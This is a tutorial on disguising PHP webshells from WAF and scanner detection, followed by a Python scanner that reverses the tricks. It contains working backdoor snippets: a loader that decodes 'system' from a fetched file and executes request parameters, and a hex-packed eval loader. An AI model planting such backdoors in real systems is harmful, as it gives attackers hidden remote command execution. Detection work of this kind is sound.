0x1
A string variable followed by parentheses is called as the function of that name (PHP "variable functions"):
<?php
$s = 'system';
$e = 'assert';
$s('whoami');       // runs the shell command whoami
$e('phpinfo();');   // assert() evaluates a string argument as PHP code on PHP 5 and 7 only
0x2
The functions most commonly used to execute commands or code are:
system('command')
eval('PHP code')
assert('PHP code')
These three are the ones seen most often. Two caveats: eval is a language construct rather than a function, so it cannot be called through a variable ($e = 'eval'; $e('...') fails; system() and assert() can be called that way as in 0x1), and assert() only evaluates string arguments up to PHP 7, PHP 8.0 removed that behaviour.
0x3
base64_encode / base64_decode
<?php
$b = base64_encode('whoami');
echo $b . '<br/>';                 // d2hvYW1p
echo base64_decode($b) . '<br/>';  // whoami
0x4
gzcompress / gzuncompress compress and decompress data
<?php
$c = gzcompress('whoami');        // a binary zlib stream, not printable as-is
echo $c . '<br/>';
echo gzuncompress($c) . '<br/>';  // whoami
0x5
Given command execution through a variable function, plus base64 encoding and gz compression, we can write a backdoor like this.
First compress the backdoor, then base64_encode the result (the base64 layer keeps the binary compressed bytes from breaking the code when handled as text).
If the backdoor is PHP code rather than a function name, eval or assert can execute it at the end.
PHP also has this function:
file_get_contents(URL)
It reads the contents of a remote file into a variable (this requires allow_url_fopen, which is enabled by default):
$shell = file_get_contents('http://localhost/shell.jpg');
Let us test, starting with the simplest example.
Create the gzcompress + base64_encode encoded file:
<?php
$c = 'system';
$data = gzcompress($c);
$file_data = base64_encode($data);
echo $file_data;
fwrite(fopen('shell.txt', 'w'), $file_data);  // the file the loader below fetches
So we now have the string "system", compressed and then base64 encoded.
Use it:
<?php
$c = file_get_contents('http://localhost/shell.txt');  // fetch the encoded data
$s = gzuncompress(base64_decode($c));                  // decode it: $s is now 'system'
$s($_GET['session']);                                  // execute the command
So the question is: why take such a roundabout route?
The reason is simple. Once the function name is compressed and encoded, the literal string "system" appears neither in the file on disk nor in the request; it only exists in memory after gzuncompress(base64_decode()) runs, so a WAF or scanner that matches on the plain name may not detect anything dangerous.
0x6
ASCII conversion functions: chr / ord
<?php
$str = 'system';
for ($count = 0; $count < strlen($str); $count++) {
    echo substr($str, $count, 1) . '~' . ord(substr($str, $count, 1)) . '<br/>';
}
/*
s~115
y~121
s~115
t~116
e~101
m~109
*/
The reverse direction, chr(115) . chr(121) . chr(115) . chr(116) . chr(101) . chr(109), rebuilds 'system' without the literal string ever appearing in the file.
0x7
str_replace character substitution function:
<?php
$s = str_replace('p', '', 'pspypsptpepmp');
echo $s;  // system
0x8
create_function() creates an anonymous function from a code string:
<?php
// create_function('parameter list', 'PHP code string');
$info = create_function('', 'phpinfo();');
$info();
create_function() is deprecated since PHP 7.2 and was removed in PHP 8.0, so this only works on older interpreters.
0x9
pack function
pack('format', hex string)
pack() is a little involved and not commonly used, but to turn a hex string back into characters you can use the H* format (bin2hex() is its inverse):
<?php
$x = bin2hex('system');  // 73797374656d
$s = pack('H*', $x);     // 'system'
echo $s . '<br/>';
$s('whoami');
The key use of pack() is that sensitive function names can be stored as hex and packed back at run time.
For example, with create_function('', $shell), where $shell is PHP code, pack() hides the sensitive function names inside $shell. In the loader below the hex pieces decode as shown in the comments; the base64 blob is truncated in the source as reproduced here and the case of its characters was lost, so it cannot be decompressed as shown:
<?php
$shell = pack('H*', '2470617373776f72643d27') . $password        // $password='
       . pack('H*', '273b247368656c6c6e616d653d27') . $username  // ';$shellname='
       . pack('H*', '273b246d7975726c3d27') . $url               // ';$myurl='
       . pack('H*', '273b6576616c28677a756e636f6d7072657373286261736536345f6465636f64652827')  // ';eval(gzuncompress(base64_decode('
       . 'ejzs/xt3hnd5jor/zazl71buw2rawqxu1uuqsopkgheabebslkid02g0gcyaaki7qyci+geczzxohm+kjetiwzdbkmnzsi1fkmxhyzot8wqyk/hpcybjtjkzjln+z7n3vxvvx0bqtppjoozeoltq3/d73+/77tb6wqdbbxfhj2y/8zsb9c3gxn28vhunurhrrnc65cmxtzvo+vq0/hh5jvheuly6fi9cjba9s1h5ixyn/vanu18vffjnsnxeyl/ubnebzb3qbh3vs8/fhg/atbwuf/Mistn+yfa9u7zb3wru';  // truncated in the original
$f = create_function('', $shell);
The format codes of PHP's pack() follow Perl's pack; see the Perl pack documentation for the full list.
Summary
Create a gzcompress + base64_encode encoded file (disguised as something like logo.png) and fetch it with file_get_contents().
Use str_replace / chr / ord / pack / create_function to keep sensitive function names out of the source and bypass some WAF signature detection.
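The detection-side counterpart of the tricks in 0x5 through 0x9, as an added example that is not code from the original post: a small Python scanner that folds chr() chains, pack('H*', ...) and str_replace() with literal arguments back into their strings, decodes any embedded base64 and gzcompress (zlib) payload, and then flags sensitive function names. The list of flagged names, the sample webshell fragments and the helper names are constructed for this example and are assumptions; make_shell_txt() reproduces what the 0x5 script writes to shell.txt, because PHP's gzcompress() and Python's zlib.compress() both emit the zlib format.

```python
"""Added example: undo the obfuscation tricks from the post and flag what is underneath."""
import base64
import binascii
import re
import zlib

# Names worth flagging once the obfuscation is undone (assumed list; extend as needed).
SENSITIVE = ("system", "exec", "shell_exec", "passthru", "popen", "proc_open",
             "eval", "assert", "create_function", "preg_replace")

CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*", re.I)
PACK_HEX = re.compile(r"pack\(\s*['\"]H\*['\"]\s*,\s*['\"]([0-9a-fA-F]+)['\"]\s*\)", re.I)
STR_REPLACE = re.compile(r"str_replace\(\s*'([^']*)'\s*,\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
BASE64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def make_shell_txt(php_code: str) -> str:
    """Same bytes as PHP's base64_encode(gzcompress($code)): both are zlib + base64."""
    return base64.b64encode(zlib.compress(php_code.encode())).decode()


def fold_chr(src: str) -> str:
    """chr(115).chr(121)... -> 'sy...'"""
    def repl(m):
        return "'" + "".join(chr(int(n)) for n in re.findall(r"\d{1,3}", m.group(0))) + "'"
    return CHR_CHAIN.sub(repl, src)


def fold_pack(src: str) -> str:
    """pack('H*', '73797374656d') -> 'system' (odd-length hex is left untouched)"""
    def repl(m):
        try:
            return "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'"
        except ValueError:
            return m.group(0)
    return PACK_HEX.sub(repl, src)


def fold_str_replace(src: str) -> str:
    """str_replace('p', '', 'pspypsptpepmp') -> 'system' (literal arguments only)"""
    return STR_REPLACE.sub(lambda m: "'" + m.group(3).replace(m.group(1), m.group(2)) + "'", src)


def normalize(src: str, depth: int = 0) -> str:
    """Undo the reversible tricks, then decode embedded base64 / zlib payloads and
    normalize the decoded text as well, to a bounded depth."""
    text = fold_str_replace(fold_pack(fold_chr(src)))
    if depth >= 4:
        return text
    for token in BASE64_TOKEN.findall(text):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        if raw[:1] == b"\x78":  # zlib header, i.e. gzcompress() output
            try:
                raw = zlib.decompress(raw)
            except zlib.error:
                pass
        inner = raw.decode("latin-1")
        # Only keep decoded data that looks like text; skip binary false positives.
        if inner and sum(ch.isprintable() or ch in "\r\n\t" for ch in inner) >= 0.9 * len(inner):
            text += "\n" + normalize(inner, depth + 1)
    return text


def scan(src: str) -> list:
    """Sorted list of sensitive names present after de-obfuscation."""
    text = normalize(src).lower()
    return sorted(n for n in SENSITIVE if re.search(r"\b%s\b" % n, text))


# Constructed samples, one per trick from the post (not taken from any real target).
SAMPLES = {
    "variable function": "<?php $s = 'system'; $s($_GET['cmd']);",
    "chr chain": "<?php $s = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $s('whoami');",
    "str_replace": "<?php $s = str_replace('p', '', 'pspypsptpepmp'); $s('whoami');",
    "pack H*": "<?php $s = pack('H*', '73797374656d'); $s('whoami');",
    "gz+base64 file (0x5)": make_shell_txt("system"),   # contents of shell.txt
    "benign": "<?php echo date('Y-m-d');",
}
# Nested case in the style of 0x9: a hex-packed loader wrapping a gz+base64 second stage.
STAGE2 = make_shell_txt("system($_GET['c']);")
LOADER = "eval(gzuncompress(base64_decode('" + STAGE2 + "')));"
SAMPLES["nested (0x9)"] = "<?php $f = create_function('', pack('H*', '" + LOADER.encode().hex() + "')); $f();"

if __name__ == "__main__":
    for name, src in SAMPLES.items():
        print("%-22s %s" % (name, ", ".join(scan(src)) or "-"))
```

The folding only handles literal arguments, which is exactly what the post's tricks use; names assembled from variables at run time (or built by a str_replace whose subject comes from a request) are not recovered this way, so such a scanner complements, rather than replaces, runtime controls like disable_functions.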